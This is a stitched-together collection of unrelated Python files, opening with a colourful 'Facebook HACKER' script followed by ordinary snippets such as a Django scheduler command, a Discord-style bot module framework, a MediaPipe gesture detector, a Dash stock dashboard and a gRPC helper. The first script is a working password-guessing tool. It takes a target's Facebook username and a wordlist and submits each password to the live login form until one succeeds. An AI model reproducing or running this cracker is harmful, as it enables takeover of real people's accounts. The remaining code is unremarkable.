\033[1;96m D
\033[1;91m N
\033[1;91m A
\033[1;91m N
\033[1;93m T
\033[1;93m W
\033[1;93m R
\033[1;96m OMAR ADNAN✔
\033[1;94m FACEBOOK: Omar Adnan
\033[1;93m FACEBOOK PAGE: https://www.facebook.com/play.itnow
"""
CorrectUsername = "OMARADNAN"
CorrectPassword = "SEVENWE"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;92m \x1b[1;93mTOOL USERNAME \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;92m \x1b[1;93mTOOL PASSWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as OMAR ADNAN"
loop = 'false'
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
else:
print "Wrong Password"
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
else:
print "Wrong Username"
os.system('xdg-open https://www.facebook.com/alaminkhan.60')
time.sleep(0.5)
print """
\033[1;92m ___________¶________________________________¶_____________
\033[1;92m ___________¶___¶__________________________¶___¶___________
\033[1;92m ___________¶__¶____________________________¶__¶___________
\033[1;92m __________¶___¶____________________________¶___¶__________
\033[1;92m __________¶__¶¶____________________________¶¶__¶__________
\033[1;92m __________¶__¶______________________________¶__¶__________
\033[1;92m __________¶__¶______________________________¶__¶__________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m _________¶¶__¶______________________________¶__¶¶_________
\033[1;92m ______¶__¶¶__¶______________________________¶__¶¶__¶______
\033[1;92m ______¶__¶¶__¶_____________________________¶¶__¶¶__¶______
\033[1;92m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;92m ______¶___¶___¶____________________________¶___¶___¶______
\033[1;92m ______¶¶__¶___¶_________¶________¶_________¶___¶__¶¶______
\033[1;92m _______¶__¶¶__¶¶_______¶__________¶_______¶¶__¶¶__¶_______
\033[1;91m _______¶___¶___¶_______¶__________¶_______¶___¶___¶_______
\033[1;91m _______¶¶__¶¶__¶¶_____¶____________¶_____¶___¶¶__¶¶_______
\033[1;91m _______¶¶_¶¶¶___¶¶____¶____________¶____¶¶___¶¶¶¶¶¶_______
\033[1;91m ________¶¶__¶¶___¶___¶¶____________¶____¶___¶¶__¶¶________
\033[1;91m ________¶____¶_¶__¶__¶______________¶__¶__¶_¶____¶________
\033[1;91m _______¶_¶__¶¶_¶___¶_¶______________¶_¶___¶_¶¶_¶¶_¶_______
\033[1;91m _________¶¶¶¶__¶¶____¶______________¶____¶¶__¶¶¶¶_________
\033[1;91m __________¶¶____¶¶___¶______________¶___¶¶____¶¶__________
\033[1;91m _________¶¶¶¶____¶___¶¶____________¶¶___¶____¶¶¶¶_________
\033[1;91m ________¶__¶¶_____¶¶___¶___¶¶¶¶___¶___¶¶_____¶¶__¶________
\033[1;91m _______¶____¶¶__¶¶_¶¶¶__¶¶_¶¶¶¶_¶¶__¶¶¶_¶¶__¶¶____¶_______
\033[1;91m ______¶______¶¶¶¶___¶¶¶¶¶¶¶¶¶_¶¶¶¶¶¶¶¶___¶_¶¶______¶______
\033[1;91m _____¶_______¶¶¶_____¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_____¶¶¶_______¶_____
\033[1;91m ___________¶¶¶_¶¶__¶¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶¶__¶¶_¶¶____________
\033[1;91m __________¶¶¶_____¶¶___¶___¶¶¶¶___¶___¶¶_____¶¶¶__________
\033[1;91m _________¶¶¶_____¶¶__¶¶__¶¶¶¶¶¶¶¶__¶¶__¶¶_____¶¶¶_________
\033[1;91m __________¶¶____¶¶__¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶__¶____¶¶¶__________
\033[1;91m ___________¶¶¶__¶___¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶___¶__¶¶¶___________
\033[1;91m _____¶_______¶¶_¶___¶¶_¶¶¶¶¶¶¶¶¶¶¶¶_¶¶___¶_¶¶_______¶_____
\033[1;91m ______¶______¶¶¶¶___¶¶__¶¶¶¶¶¶¶¶¶¶__¶¶___¶_¶¶______¶______
\033[1;91m _______¶____¶¶_¶_¶__¶___¶¶¶¶¶¶¶¶¶¶___¶__¶_¶_¶¶____¶_______
\033[1;91m ________¶__¶¶__¶_¶¶_¶_____¶¶¶¶¶¶_____¶_¶¶_¶__¶¶__¶________
\033[1;91m _________¶_¶¶__¶_¶¶_¶_______¶¶_______¶_¶¶_¶__¶¶¶¶_________
\033[1;91m __________¶¶____¶¶__¶¶¶____________¶¶¶__¶¶____¶¶__________
\033[1;91m _________¶¶¶¶_______¶¶______________¶¶_______¶¶¶¶_________
\033[1;91m _______¶_¶__¶¶¶____¶_¶______________¶_¶____¶¶¶_¶¶_¶_______
\033[1;91m ________¶____¶¶___¶__¶______________¶_¶¶___¶¶____¶________
\033[1;91m ________¶¶__¶¶___¶¶__¶¶____________¶¶__¶¶___¶¶__¶¶________
\033[1;91m _______¶¶¶¶¶¶¶__¶¶____¶____________¶____¶¶__¶¶¶¶¶¶¶_______
\033[1;91m _______¶¶__¶¶__¶¶_________________¶______¶¶__¶¶__¶¶_______
\033[1;91m _______¶___¶___¶__________________________¶___¶___¶_______
\033[1;96m _______¶__¶¶__¶¶__________________________¶¶__¶¶__¶_______
\033[1;96m ______¶¶__¶___¶____________________________¶___¶__¶¶______
\033[1;96m ______¶___¶___¶____________________________¶___¶___¶______
\033[1;96m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;96m ______¶__¶¶__¶¶____________________________¶¶__¶¶__¶______
\033[1;96m ______¶__¶¶__¶______________________________¶__¶¶__¶______
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m _________¶¶__¶______________________________¶__¶¶_________
\033[1;96m __________¶__¶______________________________¶__¶__________
\033[1;96m __________¶__¶______________________________¶__¶__________
\033[1;96m __________¶__¶¶____________________________¶¶__¶__________
\033[1;96m __________¶___¶____________________________¶___¶__________
\033[1;96m _______¶__¶________________________________¶__¶___________
\033[1;96m _______¶__________________________________¶___¶___________
\033[1;96m ____________¶________________________________¶____________
\033[1;93m ____________¶________________________________¶____________
\033[1;91m____ ____ ___ ____ _____ ____ __ __ _ _ _
\033[1;92m/ ___|| _ \_ _| _ \| ____| _ \ | \/ | / \ | \ | |
\033[1;91m\___ \| |_) | || | | | _| | |_) | | |\/| | / _ \ | \| |
\033[1;94m ___) | __/| || |_| | |___| _ < | | | |/ ___ \| |\ |
\033[1;92m|____/|_| |___|____/|_____|_| \_\ |_| |_/_/ \_\_| \_|
\033[1;93m AUTHOR: HAUNTERBOY ALAMIN✔
\033[1;94m FACEBOOK: MD ALAMIN KHAN
\033[1;93m FACEBOOK: PAGE:https://www.facebook.com/alaminkhan.60
"""
user = raw_input('[✪] Facebook Target Username/ID/Email ::: ')
time.sleep(0.8)
wrdlstFileName = raw_input('\n[⊕] Wordlist Type (file.txt) ::: ')
try:
wordlist = open(wrdlstFileName, 'r')
except FileNotFoundError:
print ('\n[!] File Not Found!')
exit()
print """
\033[1;94m ───────────▄▄▄▄▄▄▄▄▄───────────
\033[1;94m ────────▄█████████████▄────────
\033[1;94m █████──█████████████████──█████
\033[1;94m ▐████▌─▀███▄───────▄███▀─▐████▌
\033[1;94m ─█████▄──▀███▄───▄███▀──▄█████─
\033[1;94m ─▐██▀███▄──▀███▄███▀──▄███▀██▌─
\033[1;94m ──███▄▀███▄──▀███▀──▄███▀▄███──
\033[1;91m ──▐█▄▀█▄▀███─▄─▀─▄─███▀▄█▀▄█▌──
\033[1;91m ───███▄▀█▄██─██▄██─██▄█▀▄███───
\033[1;91m ────▀███▄▀██─█████─██▀▄███▀────
\033[1;91m ───█▄─▀█████─█████─█████▀─▄█───
\033[1;91m ───███────────███────────███───
\033[1;91m ───███▄────▄█─███─█▄────▄███───
\033[1;91m ───█████─▄███─███─███▄─█████───
\033[1;91m ───█████─████─███─████─█████───
\033[1;92m ───█████─████─███─████─█████───
\033[1;92m ───█████─████─███─████─█████───
\033[1;92m ───█████─████▄▄▄▄▄████─█████───
\033[1;92m ────▀███─█████████████─███▀────
\033[1;92m ──────▀█─███─▄▄▄▄▄─███─█▀──────
\033[1;92m ─────────▀█▌▐█████▌▐█▀─────────
\033[1;92m ────────────███████────────────
\033[1;94m +===============================================+
\033[1;92m |............. Facebook HACKER .............|
\033[1;92m +-----------------------------------------------+
\033[1;92m | #Author: HAUNTERBOY ALAMIN |
\033[1;91m | Version 3.0 |
\033[1;92m | https://www.facebook.com/play.itnow |
\033[1;91m +===============================================+
\033[1;96m |.............. fb-Terget ...............|
+-----------------------------------------------+\n\n
"""
time.sleep(0.8)
print '\n\nCracking '+user+' Now...'
time.sleep(1)
print '\nIM NOT RESPONSIBLE FOR ANY MISS USE HAUNTERBOY ALAMIN\n'
for password in wordlist:
if password == '' or password == ' ':
pass
else:
try:
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
fb = browser.open('https://facebook.com')
dos = open('Facebook-Log.txt', 'w+')
browser.select_form(nr=0)
browser.form['email'] = user
browser.form['pass'] = password
browser.method = 'POST'
browser.submit()
dos.write(browser.open('https://facebook.com').read())
dos.seek(0)
text = dos.read().decode('UTF-8')
if text.find('home_icon', 0, len(text)) != -1:
print '\033[1;96m[✔] Password Found >>>>➤ '+password
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
else:
print "\033[1;96m[✘] Wrong Password >>>➤ "+str(password)
except KeyboardInterrupt:
print '\n#############################################\n Exiting..'
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
time.sleep(1)
print 'Sorry, none of the passswords in your wordlist is right.'
time.sleep(0.8)
dos.close()
os.system('rm Facebook-Log.txt || del Facebook-Log.txt')
exit()
|
# creo uno script per poterlo usare nell'heroku scheduler
# ne faccio un base command, così ogni tot heroku lo ranna ed è come se lo runnasse da consolle
from django.core.management.base import BaseCommand
from pm_lookup.processing.scheduled_processing import save_history_pm
from pm_lookup.processing.scheduled_processing_2 import arrange_time_series_and_graphs
# quando scrivo
# python manage.py save_current_pm_values_in_history
# la funzione command viene rannata automaticamente
class Command(BaseCommand):
def handle(self, *args, **options):
#salva i valori nel modello storico orario
save_history_pm()
#arrangia le serie orarie attingendo al modello storico orario
arrange_time_series_and_graphs()
|
# command definitions
START_FOC = (0x03)
ACC_MODE_NORMAL = (0x11)
GYR_MODE_NORMAL = (0x15)
FIFO_FLUSH = (0xB0)
INT_RESET = (0xB1)
STEP_CNT_CLR = (0xB2)
SOFT_RESET = (0xB6)
|
from .command import Command
from datetime import timedelta, datetime
import traceback
import asyncio
class Task:
def __init__(self, callback, delta=True, **units):
self.delta = delta
self.callback = callback
self.units = units
self.module = None # Gets filled by bot.add_module
@property
def time_to_wait(self):
if self.delta:
return timedelta(**self.units).total_seconds()
now = datetime.utcnow()
time = datetime.utcnow().replace(
hour=self.units.get("hour", 0),
minute=self.units.get("minute", 0),
second=self.units.get("seconds", 0),
microsecond=0
)
wait = time - now
if wait.total_seconds() < 0:
wait += timedelta(days=1)
return wait.total_seconds()
def construct(self):
async def coro():
while True:
await asyncio.sleep(self.time_to_wait)
try:
await self.callback(self.module)
except:
traceback.print_exc()
return coro()
class Listener:
def __init__(self, callback, name=None):
name = name or callback.__name__
if name.startswith("on_"):
name = name[3:]
self.module = None # Gets filled by bot.add_module
self.name = name
self.callback = callback
async def execute(self, *args, **kwargs):
if self.module is None:
await self.callback(*args, **kwargs)
else:
await self.callback(self.module, *args, **kwargs)
class Module:
def __init__(self, client):
self.client = client
self.bot = client
@property
def commands(self):
for name in dir(self):
attr = getattr(self, name)
# attr.parent is None checks if it is a subcommand
if isinstance(attr, Command) and attr.parent is None:
yield attr
@property
def listeners(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Listener):
yield attr
@property
def tasks(self):
for name in dir(self):
attr = getattr(self, name)
if isinstance(attr, Task):
yield attr
@staticmethod
def command(*args, **kwargs):
def _predicate(callback):
return Command(callback, *args, **kwargs)
return _predicate
@staticmethod
def listener(*args, **kwargs):
def _predicate(callback):
return Listener(callback, *args, **kwargs)
return _predicate
@staticmethod
def task(*args, **kwargs):
def _predicate(callback):
return Task(callback, *args, **kwargs)
return _predicate
|
# Please also refer to other files in student_contributed for more tests
class a(object):
a: a = None # members can have the same name as class
A: a = None
B: [b] = None
class b(object):
def b(self:b, other:a): # methods can have same name as class
A.a = other # assign to member doesn't need global decl
B[1] = None # nor does assign to array element
self.b(other.a)
len(42.__init__().__init__()).__init__() # some crazy use of __init__
|
'''
each row of created .csv file is of the form:
polarity, id, date, query, user, comment, test_or_training
'''
import csv
import os
parent_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
train_file_name = os.path.join(parent_path, 'data', 'raw_data', 'training.csv')
training = []
with open(train_file_name, 'rt', encoding='ISO-8859-1') as f:
reader = csv.reader(f)
training = list(reader)
test_file_name = os.path.join(parent_path, 'data', 'raw_data', 'test.csv')
test = []
with open(test_file_name, 'rt', encoding='ISO-8859-1') as f:
reader = csv.reader(f)
test = list(reader)
out_file_name = os.path.join(parent_path, 'data', 'intermediate', 'all_data.csv')
with open(out_file_name, 'w') as f:
writer = csv.writer(f)
for row in training:
row.append('training')
writer.writerow(row)
for row in test:
row.append('test')
writer.writerow(row)
|
from typing import List
class NumArray:
def __init__(self, nums: List[int]):
self.sum_till = [0] * (len(nums) + 1)
for index, number in enumerate(nums):
self.sum_till[index + 1] = self.sum_till[index] + number
def sumRange(self, left: int, right: int) -> int:
return self.sum_till[right + 1] - self.sum_till[left]
|
import cv2
import mediapipe as mp
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
# For webcam input:
cap = cv2.VideoCapture(0)
with mp_hands.Hands(
min_detection_confidence=0.5,
min_tracking_confidence=0.5,
max_num_hands=1) as hands:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
image_height, image_width, _ = image.shape
# Flip the image horizontally for a later selfie-view display, and convert
# the BGR image to RGB.
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
# To improve performance, optionally mark the image as not writeable to
# pass by reference.
image.flags.writeable = False
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
gesture = False;
if results.multi_hand_landmarks:
hand_landmarks = results.multi_hand_landmarks[0]
mp_drawing.draw_landmarks(
image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
#get the finger tip coordinates we are interested in
index_x = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x * image_width
index_y = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y * image_height
index_dip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_DIP].y * image_height
thumb_x = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x * image_width
thumb_y = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y * image_height
middle_x = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].x * image_width
middle_y = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_TIP].y * image_height
knuckle_x = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].x * image_width
knuckle_y = hand_landmarks.landmark[mp_hands.HandLandmark.MIDDLE_FINGER_MCP].y * image_height
ring_y = hand_landmarks.landmark[mp_hands.HandLandmark.RING_FINGER_TIP].y * image_height
pinky_y = hand_landmarks.landmark[mp_hands.HandLandmark.PINKY_TIP].y * image_height
if (results.multi_handedness[0].classification[0].label == "Right"):
key_x = min(knuckle_x, middle_x)
else:
key_x = max(knuckle_x, middle_x)
clenched = (pinky_y > knuckle_y) and (middle_y > knuckle_y) and (pinky_y > knuckle_y)
gesture = (abs(key_x - thumb_x) > abs(index_y - knuckle_y)/1.7) and clenched\
and (index_dip > index_y)
#print('Handedness:', results.multi_handedness[0].classification[0].label)
if gesture:
print("gesture")
else:
print("no gesture")
cv2.imshow('MediaPipe Hands', image)
if cv2.waitKey(5) & 0xFF == 27:
break
cap.release()
|
from .community_chat import CommunityChat
from .group_community import GroupCommunity
from .group_rules import GroupRules
from .invite_link import (InviteLink, INVITE_LINK_REGEX,
INVITE_LINK_MAX_LENGTH)
from .member import Member
|
# -*- coding: utf-8 -*-
import os
import flask
import functools
import dash
import pyEX.client as p
import json
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
from perspective_dash_component import PerspectiveDash
c = p.Client()
def peerCorrelation(client, symbol, timeframe='6m'):
peers = client.peers(symbol)
rets = client.batchDF(peers + [symbol], 'chart', timeframe)['chart']
ret = rets.pivot(columns='symbol', values='changePercent').corr()
ret.index.name = 'symbol'
ret.columns = ret.columns.tolist()
return ret
################################
# Helpers to cache data lookup #
@functools.lru_cache(100)
def fetch_data(value):
return c.chartDF(value, '6m').to_dict(orient='records')
@functools.lru_cache(100)
def fetch_corr_data(value):
df = peerCorrelation(c, value)
df.index.name = 'symbols'
return df.index.tolist(), df.reset_index().to_dict(orient='records')
################################
################
# Default data #
symbols = c.symbols()
default_data = fetch_data('JPM')
default_data2 = fetch_corr_data('JPM')
default_data2cols, default_data2data = default_data2
################
################
# dash
server = flask.Flask(__name__)
app = dash.Dash(__name__, server=server)
################
################
# layout
app.layout = html.Div(children=[
html.H1(children='Perspective Demo', style={'textAlign': 'center'}),
dcc.Dropdown(id='tickerinput', value='JPM', options=[{'label': s['symbol'] + ' - ' + s['name'], 'value': s['symbol']} for s in symbols]),
PerspectiveDash(id='psp1', data=default_data, view='y_line', columns=['open', 'high', 'low', 'close']),
html.Div(children=[
PerspectiveDash(id='psp2', data=default_data),
PerspectiveDash(id='psp3', data=default_data2data, view='heatmap', columns=default_data2cols, rowpivots=['symbols'])],
style={'width': '100%', 'display': 'flex', 'flex-direction': 'row'}),
html.Div(id='intermediate-value', style={'display': 'none'})
],
style={'height': '100%', 'width': '100%', 'display': 'flex', 'flex-direction': 'column'})
################
################
# callbacks
@app.callback(Output('intermediate-value', 'children'), [Input('tickerinput', 'value')])
def fetch_new_data(value):
return json.dumps(fetch_data(value))
@app.callback(Output('psp1', 'data'), [Input('intermediate-value', 'children')])
def update_psp1(value):
return json.loads(value)
@app.callback(Output('psp2', 'data'), [Input('intermediate-value', 'children')])
def update_psp2(value):
return json.loads(value)
# Data
@app.callback(Output('psp3', 'data'), [Input('tickerinput', 'value')])
def update_psp3data(value):
return fetch_corr_data(value)[1]
# Columns
@app.callback(Output('psp3', 'columns'), [Input('tickerinput', 'value')])
def update_psp3cols(value):
return fetch_corr_data(value)[0]
################
################
# Run
if __name__ == "__main__":
port = os.environ.get('PORT')
# heroku
if port: app.run_server(port=port, debug=False, threaded=True)
else: app.run_server(debug=True, threaded=True)
|
from urllib.parse import urlparse, ParseResult
import grpc
def create_channel(hostname, port, ca=None, key=None, cert=None):
r = _create_tcp_channel(hostname, port)
if ca:
r = _wrap_tls_channel(r, ca, key, cert)
return r
def _create_tcp_channel(hostname, port):
channel = grpc.insecure_channel(f'{hostname}:{port}')
return channel
def _wrap_tls_channel(chan, ca, key=None, cert=None):
if isinstance(ca, str):
with open(ca, 'rb') as f_in:
ca = f_in.read()
if key and isinstance(key, str):
with open(key, 'rb') as f_in:
key = f_in.read()
if cert and isinstance(cert, str):
with open(cert, 'rb') as f_in:
cert = f_in.read()
return grpc.secure_channel(
chan,
grpc.ssl_channel_credentials(
ca,
key,
cert
)
)
|
#!/usr/bin/env python
# coding: utf-8
# In[13]:
n = int(input())
a = 0
for _ in range(n):
a, b, c = a+1, a+2, a+3
print('{} {} {} PUM'.format(a, b, c))
a = c+1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.